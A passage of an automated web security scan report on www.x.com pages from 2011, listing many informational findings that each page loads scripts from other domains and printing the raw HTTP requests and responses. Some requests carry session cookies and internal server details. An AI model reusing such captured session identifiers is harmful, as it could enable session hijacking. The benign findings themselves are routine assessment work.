User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=124691 t=1313157091604811
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.103. https://www.x.com/community/xcommerce-blogs/blog/tags/ebay

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/ebay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/ebay HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=106975 t=1313157091188070
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.104. https://www.x.com/community/xcommerce-blogs/blog/tags/paypal

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/paypal

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/paypal HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=95566 t=1313157090807467
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.105. https://www.x.com/community/xcommerce-blogs/blog/tags/winners

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/winners

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/winners HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=68066 t=1313157090473016
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.106. https://www.x.com/community/xcommerce-blogs/blog/tags/x.commerce

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/x.commerce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/x.commerce HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=61485 t=1313157092752771
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.107. https://www.x.com/community/xcommerce-blogs/blog/tags/xcommerce

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/xcommerce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/xcommerce HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=65196 t=1313157092114256
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.108. https://www.x.com/doc-publish.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /doc-publish.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /doc-publish.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 12 Aug 2011 13:58:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=24354 t=1313157521095937
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.109. https://www.x.com/docs/DOC-1031

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1031

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1031 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=96847 t=1313157228488141
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.110. https://www.x.com/docs/DOC-1041

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1041

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1041 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313333323b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:07 GMT; Path=/
Vary: User-Agent
JP: D=129414 t=1313157247469487
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.111. https://www.x.com/docs/DOC-1051

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1051

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1051 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313035313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=159037 t=1313157228026431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.112. https://www.x.com/docs/DOC-1106

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1106 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/button_manager
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b; Expires=Sun, 11-Sep-2011 13:40:10 GMT; Path=/
Vary: User-Agent
JP: D=139511 t=1313156410450395
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.113. https://www.x.com/docs/DOC-1106/delete

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106/delete

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1106/delete HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 12 Aug 2011 13:54:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=30487 t=1313157250046861
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.114. https://www.x.com/docs/DOC-1106/restore

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106/restore

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1106/restore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 12 Aug 2011 13:54:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=46640 t=1313157249824805
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.115. https://www.x.com/docs/DOC-1108

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1108

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1108 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=99860 t=1313157246030665
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.116. https://www.x.com/docs/DOC-1116

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1116

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1116 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=130471 t=1313157252790233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.117. https://www.x.com/docs/DOC-1176

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1176

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1176 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313130363b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:15 GMT; Path=/
Vary: User-Agent
JP: D=129417 t=1313157255561975
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.118. https://www.x.com/docs/DOC-1204

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1204

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1204 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:13 GMT; Path=/
Vary: User-Agent
JP: D=312167 t=1313157253541541
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.119. https://www.x.com/docs/DOC-1216

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1216

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1216 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=91982 t=1313157252137257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.120. https://www.x.com/docs/DOC-1332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1332

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1332 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313333323b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=140843 t=1313157246673403
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.121. https://www.x.com/docs/DOC-1372

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1372

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
